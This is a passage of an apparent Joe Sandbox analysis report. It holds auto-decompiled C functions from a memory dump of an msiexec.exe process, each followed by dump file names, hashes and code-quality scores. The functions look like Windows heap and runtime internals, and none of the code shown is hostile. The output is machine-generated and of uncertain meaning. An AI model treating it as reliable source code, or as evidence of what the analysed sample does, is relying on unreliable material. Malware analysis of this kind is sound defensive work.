                              									} else {
                              										L18:
                              										_t102 = E04D32C50(_t83,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)), _t99);
                              										L19:
                              										 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
                              										goto L12;
                              									}
                              								}
                              								L28:
                              							} else {
                              								E04D1EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                              								 *((intOrPtr*)(_t103 - 4)) = 1;
                              								 *((intOrPtr*)(_t103 - 0x20)) =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30)) + 0x10)) + 0x48));
                              								_t102 =  *((intOrPtr*)(_t103 + 0x1c));
                              								_t76 = E04D32AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102);
                              								 *((intOrPtr*)(_t103 - 0x1c)) = _t76;
                              								__eflags = _t76 - 0xc0000100;
                              								if(_t76 == 0xc0000100) {
                              									 *((intOrPtr*)(_t103 - 0x1c)) = E04D32C50( *((intOrPtr*)(_t103 - 0x20)),  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102, 1);
                              								}
                              								 *((intOrPtr*)(_t103 - 4)) = _t99;
                              								E04D32ACB();
                              							}
                              						}
                              					}
                              					L12:
                              					 *((intOrPtr*)(_t103 - 4)) = 0xfffffffe;
                              					_t62 = _t102;
                              				}
                              				L13:
                              				return E04D5D0D1(_t62);
                              				goto L28;
                              			}

                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 1327b5c5f3763e63cec69d8f95bb7b434c2c148173e2ee5c52d8ac29a710c249
                              • Instruction ID: e9c404aec5160e3e500029895588550ffe785323e35de1762dfd292a2d84ffff
                              • Opcode Fuzzy Hash: 1327b5c5f3763e63cec69d8f95bb7b434c2c148173e2ee5c52d8ac29a710c249
                              • Instruction Fuzzy Hash: D7514471E00219EFDF25DF95C880AEEBBB5FF48314F148095E801AB220D731E992DBA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 78%
                              			E04D34D3B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
                              				signed int _v12;
                              				char _v176;
                              				char _v177;
                              				char _v184;
                              				intOrPtr _v192;
                              				intOrPtr _v196;
                              				void* __ebx;
                              				void* __edi;
                              				void* __esi;
                              				signed short _t42;
                              				char* _t44;
                              				intOrPtr _t46;
                              				intOrPtr _t50;
                              				char* _t57;
                              				intOrPtr _t59;
                              				intOrPtr _t67;
                              				signed int _t69;
                              
                              				_t64 = __edx;
                              				_v12 =  *0x4dfd360 ^ _t69;
                              				_t65 = 0xa0;
                              				_v196 = __edx;
                              				_v177 = 0;
                              				_t67 = __ecx;
                              				_v192 = __ecx;
                              				E04D4FA60( &_v176, 0, 0xa0);
                              				_t57 =  &_v176;
                              				_t59 = 0xa0;
                              				if( *0x4df7bc8 != 0) {
                              					L3:
                              					while(1) {
                              						asm("movsd");
                              						asm("movsd");
                              						asm("movsd");
                              						asm("movsd");
                              						_t67 = _v192;
                              						 *((intOrPtr*)(_t57 + 0x10)) = _a4;
                              						 *(_t57 + 0x24) =  *(_t57 + 0x24) & 0x00000000;
                              						 *(_t57 + 0x14) =  *(_t67 + 0x34) & 0x0000ffff;
                              						 *((intOrPtr*)(_t57 + 0x20)) = _v196;
                              						_push( &_v184);
                              						_push(_t59);
                              						_push(_t57);
                              						_push(0xa0);
                              						_push(_t57);
                              						_push(0xf);
                              						_t42 = E04D4B0B0();
                              						if(_t42 != 0xc0000023) {
                              							break;
                              						}
                              						if(_v177 != 0) {
                              							L04D277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
                              						}
                              						_v177 = 1;
                              						_t44 = L04D24620(_t59,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v184);
                              						_t59 = _v184;
                              						_t57 = _t44;
                              						if(_t57 != 0) {
                              							continue;
                              						} else {
                              							_t42 = 0xc0000017;
                              							break;
                              						}
                              					}
                              					if(_t42 != 0) {
                              						_t65 = E04D0CCC0(_t42);
                              						if(_t65 != 0) {
                              							L10:
                              							if(_v177 != 0) {
                              								if(_t57 != 0) {
                              									L04D277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
                              								}
                              							}
                              							_t46 = _t65;
                              							L12:
                              							return E04D4B640(_t46, _t57, _v12 ^ _t69, _t64, _t65, _t67);
                              						}
                              						L7:
                              						_t50 = _a4;
                              						 *((intOrPtr*)(_t67 + 0x30)) =  *((intOrPtr*)(_t57 + 0x18));
                              						if(_t50 != 3) {
                              							if(_t50 == 2) {
                              								goto L8;
                              							}
                              							L9:
                              							if(E04D4F380(_t67 + 0xc, 0x4ce5138, 0x10) == 0) {
                              								 *0x4df60d8 = _t67;
                              							}
                              							goto L10;
                              						}
                              						L8:
                              						_t64 = _t57 + 0x28;
                              						E04D34F49(_t67, _t57 + 0x28);
                              						goto L9;
                              					}
                              					_t65 = 0;
                              					goto L7;
                              				}
                              				if(E04D34E70(0x4df86b0, 0x4d35690, 0, 0) != 0) {
                              					_t46 = E04D0CCC0(_t56);
                              					goto L12;
                              				} else {
                              					_t59 = 0xa0;
                              					goto L3;
                              				}
                              			}

                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: d17dc52681d8ff29c720a508dbfc61508d73a46222525887c26e6d0564728184
                              • Instruction ID: 4233418489ff95f62afcaaeadc292857a2d653ee7a2345b49c939a1c6a7b369e
                              • Opcode Fuzzy Hash: d17dc52681d8ff29c720a508dbfc61508d73a46222525887c26e6d0564728184
                              • Instruction Fuzzy Hash: DD41A271B40318AFEB31DF14CD80F6ABBA9EB45715F0440AAE945A7280E778FD44CBA1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 85%
                              			E04D34BAD(intOrPtr __ecx, short __edx, signed char _a4, signed short _a8) {
                              				signed int _v8;
                              				short _v20;
                              				intOrPtr _v24;
                              				intOrPtr _v28;
                              				intOrPtr _v32;
                              				char _v36;
                              				char _v156;
                              				short _v158;
                              				intOrPtr _v160;
                              				char _v164;
                              				intOrPtr _v168;
                              				void* __ebx;
                              				void* __edi;
                              				void* __esi;
                              				signed int _t45;
                              				intOrPtr _t74;
                              				signed char _t77;
                              				intOrPtr _t84;
                              				char* _t85;
                              				void* _t86;
                              				intOrPtr _t87;
                              				signed short _t88;
                              				signed int _t89;
                              
                              				_t83 = __edx;
                              				_v8 =  *0x4dfd360 ^ _t89;
                              				_t45 = _a8 & 0x0000ffff;
                              				_v158 = __edx;
                              				_v168 = __ecx;
                              				if(_t45 == 0) {
                              					L22:
                              					_t86 = 6;
                              					L12:
                              					E04D0CC50(_t86);
                              					L11:
                              					return E04D4B640(_t86, _t77, _v8 ^ _t89, _t83, _t84, _t86);
                              				}
                              				_t77 = _a4;
                              				if((_t77 & 0x00000001) != 0) {
                              					goto L22;
                              				}
                              				_t8 = _t77 + 0x34; // 0xdce0ba00
                              				if(_t45 !=  *_t8) {
                              					goto L22;
                              				}
                              				_t9 = _t77 + 0x24; // 0x4df8504
                              				E04D22280(_t9, _t9);
                              				_t87 = 0x78;
                              				 *(_t77 + 0x2c) =  *( *[fs:0x18] + 0x24);
                              				E04D4FA60( &_v156, 0, _t87);
                              				_t13 = _t77 + 0x30; // 0x3db8
                              				_t85 =  &_v156;
                              				_v36 =  *_t13;
                              				_v28 = _v168;
                              				_v32 = 0;
                              				_v24 = 0;
                              				_v20 = _v158;
                              				_v160 = 0;
                              				while(1) {
                              					_push( &_v164);
                              					_push(_t87);
                              					_push(_t85);
                              					_push(0x18);
                              					_push( &_v36);
                              					_push(0x1e);
                              					_t88 = E04D4B0B0();
                              					if(_t88 != 0xc0000023) {
                              						break;
                              					}
                              					if(_t85 !=  &_v156) {
                              						L04D277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t85);
                              					}
                              					_t84 = L04D24620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v164);
                              					_v168 = _v164;
                              					if(_t84 == 0) {
                              						_t88 = 0xc0000017;
                              						goto L19;
                              					} else {
                              						_t74 = _v160 + 1;
                              						_v160 = _t74;
                              						if(_t74 >= 0x10) {
                              							L19:
                              							_t86 = E04D0CCC0(_t88);
                              							if(_t86 != 0) {
                              								L8:
                              								 *(_t77 + 0x2c) =  *(_t77 + 0x2c) & 0x00000000;
                              								_t30 = _t77 + 0x24; // 0x4df8504
                              								E04D1FFB0(_t77, _t84, _t30);
                              								if(_t84 != 0 && _t84 !=  &_v156) {
                              									L04D277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t84);
                              								}
                              								if(_t86 != 0) {
                              									goto L12;
                              								} else {
                              									goto L11;
                              								}
                              							}
                              							L6:
                              							 *(_t77 + 0x36) =  *(_t77 + 0x36) | 0x00004000;
                              							if(_v164 != 0) {
                              								_t83 = _t84;
                              								E04D34F49(_t77, _t84);
                              							}
                              							goto L8;
                              						}
                              						_t87 = _v168;
                              						continue;
                              					}
                              				}
                              				if(_t88 != 0) {
                              					goto L19;
                              				}
                              				goto L6;
                              			}

                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 64a1cd9afced1105e1c26f762e8b5ed75904676693cfa3865d7ac85fef84ab9b
                              • Instruction ID: 2790fd90fd1185791ec491f57d6e08a0f1952790bd84693a66dfe2ea27256dab
                              • Opcode Fuzzy Hash: 64a1cd9afced1105e1c26f762e8b5ed75904676693cfa3865d7ac85fef84ab9b
                              • Instruction Fuzzy Hash: 55419535B006289BDB21DF64C940BEA77B4FF45B50F0105A5E948AB240EB78FE85CFA5
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E04DCAA16(void* __ecx, intOrPtr __edx, signed int _a4, short _a8) {
                              				intOrPtr _v8;
                              				char _v12;
                              				signed int _v16;
                              				signed char _v20;
                              				intOrPtr _v24;
                              				char* _t37;
                              				void* _t47;
                              				signed char _t51;
                              				void* _t53;
                              				char _t55;
                              				intOrPtr _t57;
                              				signed char _t61;
                              				intOrPtr _t75;
                              				void* _t76;
                              				signed int _t81;
                              				intOrPtr _t82;
                              
                              				_t53 = __ecx;
                              				_t55 = 0;
                              				_v20 = _v20 & 0;
                              				_t75 = __edx;
                              				_t81 = ( *(__ecx + 0xc) | _a4) & 0x93000f0b;
                              				_v24 = __edx;
                              				_v12 = 0;
                              				if((_t81 & 0x01000000) != 0) {
                              					L5:
                              					if(_a8 != 0) {
                              						_t81 = _t81 | 0x00000008;
                              					}
                              					_t57 = E04DCABF4(_t55 + _t75, _t81);
                              					_v8 = _t57;
                              					if(_t57 < _t75 || _t75 > 0x7fffffff) {
                              						_t76 = 0;
                              						_v16 = _v16 & 0;
                              					} else {
                              						_t59 = _t53;
                              						_t76 = E04DCAB54(_t53, _t75, _t57, _t81 & 0x13000003,  &_v16);
                              						if(_t76 != 0 && (_t81 & 0x30000f08) != 0) {
                              							_t47 = E04DCAC78(_t53, _t76, _v24, _t59, _v12, _t81, _a8);
                              							_t61 = _v20;
                              							if(_t61 != 0) {
                              								 *(_t47 + 2) =  *(_t47 + 2) ^ ( *(_t47 + 2) ^ _t61) & 0x0000000f;
                              								if(E04DACB1E(_t61, _t53, _t76, 2, _t47 + 8) < 0) {
                              									L04D277F0(_t53, 0, _t76);
                              									_t76 = 0;
                              								}
                              							}
                              						}
                              					}
                              					_t82 = _v8;
                              					L16:
                              					if(E04D27D50() == 0) {
                              						_t37 = 0x7ffe0380;
                              					} else {
                              						_t37 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                              					}
                              					if( *_t37 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
                              						E04DC131B(_t53, _t76, _t82, _v16);
                              					}
                              					return _t76;
                              				}
                              				_t51 =  *(__ecx + 0x20);
                              				_v20 = _t51;
                              				if(_t51 == 0) {
                              					goto L5;
                              				}
                              				_t81 = _t81 | 0x00000008;
                              				if(E04DACB1E(_t51, __ecx, 0, 1,  &_v12) >= 0) {
                              					_t55 = _v12;
                              					goto L5;
                              				} else {
                              					_t82 = 0;
                              					_t76 = 0;
                              					_v16 = _v16 & 0;
                              					goto L16;
                              				}
                              			}

                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 702fa5d1d049179799b5169bcec1b3622bc185bb93763a62bdaaaa196ea10277
                              • Instruction ID: b5c1f8c97bc24429816f5505650686044885b54e68fa5dea47376d005aa38aec
                              • Opcode Fuzzy Hash: 702fa5d1d049179799b5169bcec1b3622bc185bb93763a62bdaaaa196ea10277
                              • Instruction Fuzzy Hash: C031F372B0011A6BEB158B65C845BAFFBABEF84314F05806DE815E7391DA74ED00CA60
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 94%
                              			E04D18A0A(intOrPtr* __ecx, signed int __edx) {
                              				signed int _v8;
                              				char _v524;
                              				signed int _v528;
                              				void* _v532;
                              				char _v536;
                              				char _v540;
                              				char _v544;
                              				intOrPtr* _v548;
                              				void* __ebx;
                              				void* __edi;
                              				void* __esi;
                              				signed int _t44;
                              				void* _t46;
                              				void* _t48;
                              				signed int _t53;
                              				signed int _t55;
                              				intOrPtr* _t62;
                              				void* _t63;
                              				unsigned int _t75;
                              				signed int _t79;
                              				unsigned int _t81;
                              				unsigned int _t83;
                              				signed int _t84;
                              				void* _t87;
                              
                              				_t76 = __edx;
                              				_v8 =  *0x4dfd360 ^ _t84;
                              				_v536 = 0x200;
                              				_t79 = 0;
                              				_v548 = __edx;
                              				_v544 = 0;
                              				_t62 = __ecx;
                              				_v540 = 0;
                              				_v532 =  &_v524;
                              				if(__edx == 0 || __ecx == 0) {
                              					L6:
                              					return E04D4B640(_t79, _t62, _v8 ^ _t84, _t76, _t79, _t81);
                              				} else {
                              					_v528 = 0;
                              					E04D1E9C0(1, __ecx, 0, 0,  &_v528);
                              					_t44 = _v528;
                              					_t81 =  *(_t44 + 0x48) & 0x0000ffff;
                              					_v528 =  *(_t44 + 0x4a) & 0x0000ffff;
                              					_t46 = 0xa;
                              					_t87 = _t81 - _t46;
                              					if(_t87 > 0 || _t87 == 0) {
                              						 *_v548 = 0x4ce1180;
                              						L5:
                              						_t79 = 1;
                              						goto L6;
                              					} else {
                              						_t48 = E04D31DB5(_t62,  &_v532,  &_v536);
                              						_t76 = _v528;
                              						if(_t48 == 0) {
                              							L9:
                              							E04D43C2A(_t81, _t76,  &_v544);
                              							 *_v548 = _v544;
                              							goto L5;
                              						}
                              						_t62 = _v532;
                              						if(_t62 != 0) {
                              							_t83 = (_t81 << 0x10) + (_t76 & 0x0000ffff);
                              							_t53 =  *_t62;
                              							_v528 = _t53;
                              							if(_t53 != 0) {
                              								_t63 = _t62 + 4;
                              								_t55 = _v528;
                              								do {
                              									if( *((intOrPtr*)(_t63 + 0x10)) == 1) {
                              										if(E04D18999(_t63,  &_v540) == 0) {
                              											_t55 = _v528;
                              										} else {
                              											_t75 = (( *(_v540 + 0x14) & 0x0000ffff) << 0x10) + ( *(_v540 + 0x16) & 0x0000ffff);
                              											_t55 = _v528;
                              											if(_t75 >= _t83) {
                              												_t83 = _t75;
                              											}
                              										}
                              									}
                              									_t63 = _t63 + 0x14;
                              									_t55 = _t55 - 1;
                              									_v528 = _t55;
                              								} while (_t55 != 0);
                              								_t62 = _v532;
                              							}
                              							if(_t62 !=  &_v524) {
                              								L04D277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t79, _t62);
                              							}
                              							_t76 = _t83 & 0x0000ffff;
                              							_t81 = _t83 >> 0x10;
                              						}
                              						goto L9;
                              					}
                              				}
                              			}




























                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: cf5849f46dd01e47d38de92b998018dab1040bf2da63c6caa88944edcccc8ae4
                              • Instruction ID: 4cd414b72bd776c1232b0462256dafe808d1308d8cfd2a772df3072e236b6b72
                              • Opcode Fuzzy Hash: cf5849f46dd01e47d38de92b998018dab1040bf2da63c6caa88944edcccc8ae4
                              • Instruction Fuzzy Hash: 9A4152B1B00228ABDB24DF55E888AA9B7F4FF54300F1045EAEC1997251E770EE80DF60
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 76%
                              			E04DCFDE2(signed int* __ecx, signed int __edx, signed int _a4) {
                              				char _v8;
                              				signed int _v12;
                              				signed int _t29;
                              				char* _t32;
                              				char* _t43;
                              				signed int _t80;
                              				signed int* _t84;
                              
                              				_push(__ecx);
                              				_push(__ecx);
                              				_t56 = __edx;
                              				_t84 = __ecx;
                              				_t80 = E04DCFD4E(__ecx, __edx);
                              				_v12 = _t80;
                              				if(_t80 != 0) {
                              					_t29 =  *__ecx & _t80;
                              					_t74 = (_t80 - _t29 >> 4 << __ecx[1]) + _t29;
                              					if(__edx <= (_t80 - _t29 >> 4 << __ecx[1]) + _t29) {
                              						E04DD0A13(__ecx, _t80, 0, _a4);
                              						_t80 = 1;
                              						if(E04D27D50() == 0) {
                              							_t32 = 0x7ffe0380;
                              						} else {
                              							_t32 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                              						}
                              						if( *_t32 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
                              							_push(3);
                              							L21:
                              							E04DC1608( *((intOrPtr*)(_t84 + 0x3c)), _t56);
                              						}
                              						goto L22;
                              					}
                              					if(( *(_t80 + 0xc) & 0x0000000c) != 8) {
                              						_t80 = E04DD2B28(__ecx[0xc], _t74, __edx, _a4,  &_v8);
                              						if(_t80 != 0) {
                              							_t66 =  *((intOrPtr*)(_t84 + 0x2c));
                              							_t77 = _v8;
                              							if(_v8 <=  *((intOrPtr*)( *((intOrPtr*)(_t84 + 0x2c)) + 0x28)) - 8) {
                              								E04DCC8F7(_t66, _t77, 0);
                              							}
                              						}
                              					} else {
                              						_t80 = E04DCDBD2(__ecx[0xb], _t74, __edx, _a4);
                              					}
                              					if(E04D27D50() == 0) {
                              						_t43 = 0x7ffe0380;
                              					} else {
                              						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                              					}
                              					if( *_t43 == 0 || ( *( *[fs:0x30] + 0x240) & 0x00000001) == 0 || _t80 == 0) {
                              						goto L22;
                              					} else {
                              						_push((0 | ( *(_v12 + 0xc) & 0x0000000c) != 0x00000008) + 2);
                              						goto L21;
                              					}
                              				} else {
                              					_push(__ecx);
                              					_push(_t80);
                              					E04DCA80D(__ecx[0xf], 9, __edx, _t80);
                              					L22:
                              					return _t80;
                              				}
                              			}











                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 3ef4319804cf21a17d71333ba11752c881d61f5af92be3a911c0d40f229f6d46
                              • Instruction ID: d4ca6158a158a3d8f8c10765e970073606cba86c49504c8a1c2850cb746c8f10
                              • Opcode Fuzzy Hash: 3ef4319804cf21a17d71333ba11752c881d61f5af92be3a911c0d40f229f6d46
                              • Instruction Fuzzy Hash: 6E31D632300642AFD7229B68C854FAA7BABFFC5754F18455DE8858B782DA75FC41C720
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 70%
                              			E04DCEA55(intOrPtr* __ecx, char __edx, signed int _a4) {
                              				signed int _v8;
                              				char _v12;
                              				intOrPtr _v15;
                              				char _v16;
                              				intOrPtr _v19;
                              				void* _v28;
                              				intOrPtr _v36;
                              				void* __ebx;
                              				void* __edi;
                              				signed char _t26;
                              				signed int _t27;
                              				char* _t40;
                              				unsigned int* _t50;
                              				intOrPtr* _t58;
                              				unsigned int _t59;
                              				char _t75;
                              				signed int _t86;
                              				intOrPtr _t88;
                              				intOrPtr* _t91;
                              
                              				_t75 = __edx;
                              				_t91 = __ecx;
                              				_v12 = __edx;
                              				_t50 = __ecx + 0x30;
                              				_t86 = _a4 & 0x00000001;
                              				if(_t86 == 0) {
                              					E04D22280(_t26, _t50);
                              					_t75 = _v16;
                              				}
                              				_t58 = _t91;
                              				_t27 = E04DCE815(_t58, _t75);
                              				_v8 = _t27;
                              				if(_t27 != 0) {
                              					E04D0F900(_t91 + 0x34, _t27);
                              					if(_t86 == 0) {
                              						E04D1FFB0(_t50, _t86, _t50);
                              					}
                              					_push( *((intOrPtr*)(_t91 + 4)));
                              					_push( *_t91);
                              					_t59 =  *(_v8 + 0x10);
                              					_t53 = 1 << (_t59 >> 0x00000002 & 0x0000003f);
                              					_push(0x8000);
                              					_t11 = _t53 - 1; // 0x0
                              					_t12 = _t53 - 1; // 0x0
                              					_v16 = ((_t59 >> 0x00000001 & 1) + (_t59 >> 0xc) << 0xc) - 1 + (1 << (_t59 >> 0x00000002 & 0x0000003f)) - (_t11 + ((_t59 >> 0x00000001 & 1) + (_t59 >> 0x0000000c) << 0x0000000c) & _t12);
                              					E04DCAFDE( &_v12,  &_v16);
                              					asm("lock xadd [eax], ecx");
                              					asm("lock xadd [eax], ecx");
                              					E04DCBCD2(_v8,  *_t91,  *((intOrPtr*)(_t91 + 4)));
                              					_t55 = _v36;
                              					_t88 = _v36;
                              					if(E04D27D50() == 0) {
                              						_t40 = 0x7ffe0388;
                              					} else {
                              						_t55 = _v19;
                              						_t40 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                              					}
                              					if( *_t40 != 0) {
                              						E04DBFE3F(_t55, _t91, _v15, _t55);
                              					}
                              				} else {
                              					if(_t86 == 0) {
                              						E04D1FFB0(_t50, _t86, _t50);
                              						_t75 = _v16;
                              					}
                              					_push(_t58);
                              					_t88 = 0;
                              					_push(0);
                              					E04DCA80D(_t91, 8, _t75, 0);
                              				}
                              				return _t88;
                              			}























                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: f5f831e91637f778ab1786019c0fe1c1c634a5059deceac50859eb6d9a86e6aa
                              • Instruction ID: 6345c63fcb40d5929de409a5948677173cd82e2c471451577c1be883063b587c
                              • Opcode Fuzzy Hash: f5f831e91637f778ab1786019c0fe1c1c634a5059deceac50859eb6d9a86e6aa
                              • Instruction Fuzzy Hash: D6317272704706AFD719DF24C980A6BB7AAFFC4214F04492EF55687640DA31F805CBA5
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 69%
                              			E04D869A6(signed short* __ecx, void* __eflags) {
                              				signed int _v8;
                              				signed int _v16;
                              				intOrPtr _v20;
                              				signed int _v24;
                              				signed short _v28;
                              				signed int _v32;
                              				intOrPtr _v36;
                              				signed int _v40;
                              				char* _v44;
                              				signed int _v48;
                              				intOrPtr _v52;
                              				signed int _v56;
                              				char _v60;
                              				signed int _v64;
                              				char _v68;
                              				char _v72;
                              				signed short* _v76;
                              				signed int _v80;
                              				char _v84;
                              				void* __ebx;
                              				void* __edi;
                              				void* __esi;
                              				void* _t68;
                              				intOrPtr _t73;
                              				signed short* _t74;
                              				void* _t77;
                              				void* _t78;
                              				signed int _t79;
                              				signed int _t80;
                              
                              				_v8 =  *0x4dfd360 ^ _t80;
                              				_t75 = 0x100;
                              				_v64 = _v64 & 0x00000000;
                              				_v76 = __ecx;
                              				_t79 = 0;
                              				_t68 = 0;
                              				_v72 = 1;
                              				_v68 =  *((intOrPtr*)( *[fs:0x18] + 0x20));
                              				_t77 = 0;
                              				if(L04D16C59(__ecx[2], 0x100, __eflags) != 0) {
                              					_t79 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
                              					if(_t79 != 0 && E04D86BA3() != 0) {
                              						_push(0);
                              						_push(0);
                              						_push(0);
                              						_push(0x1f0003);
                              						_push( &_v64);
                              						if(E04D49980() >= 0) {
                              							E04D22280(_t56, 0x4df8778);
                              							_t77 = 1;
                              							_t68 = 1;
                              							if( *0x4df8774 == 0) {
                              								asm("cdq");
                              								 *(_t79 + 0xf70) = _v64;
                              								 *(_t79 + 0xf74) = 0x100;
                              								_t75 = 0;
                              								_t73 = 4;
                              								_v60 =  &_v68;
                              								_v52 = _t73;
                              								_v36 = _t73;
                              								_t74 = _v76;
                              								_v44 =  &_v72;
                              								 *0x4df8774 = 1;
                              								_v56 = 0;
                              								_v28 = _t74[2];
                              								_v48 = 0;
                              								_v20 = ( *_t74 & 0x0000ffff) + 2;
                              								_v40 = 0;
                              								_v32 = 0;
                              								_v24 = 0;
                              								_v16 = 0;
                              								if(E04D0B6F0(0x4cec338, 0x4cec288, 3,  &_v60) == 0) {
                              									_v80 = _v80 | 0xffffffff;
                              									_push( &_v84);
                              									_push(0);
                              									_push(_v64);
                              									_v84 = 0xfa0a1f00;
                              									E04D49520();
                              								}
                              							}
                              						}
                              					}
                              				}
                              				if(_v64 != 0) {
                              					_push(_v64);
                              					E04D495D0();
                              					 *(_t79 + 0xf70) =  *(_t79 + 0xf70) & 0x00000000;
                              					 *(_t79 + 0xf74) =  *(_t79 + 0xf74) & 0x00000000;
                              				}
                              				if(_t77 != 0) {
                              					E04D1FFB0(_t68, _t77, 0x4df8778);
                              				}
                              				_pop(_t78);
                              				return E04D4B640(_t68, _t68, _v8 ^ _t80, _t75, _t78, _t79);
                              			}

































                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 39842d381a0e813d9f34c8310563486bcffd944c723f3d49334dc67202847994
                              • Instruction ID: ce860bc54623f4855eee179b666d694f160938d6350080ce6b026f9b77cbe4b9
                              • Opcode Fuzzy Hash: 39842d381a0e813d9f34c8310563486bcffd944c723f3d49334dc67202847994
                              • Instruction Fuzzy Hash: A3415DB1E00608AFDB24DFA5D940BFEBBF4FF48718F14816AE914A7250DB74A905CB51
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 85%
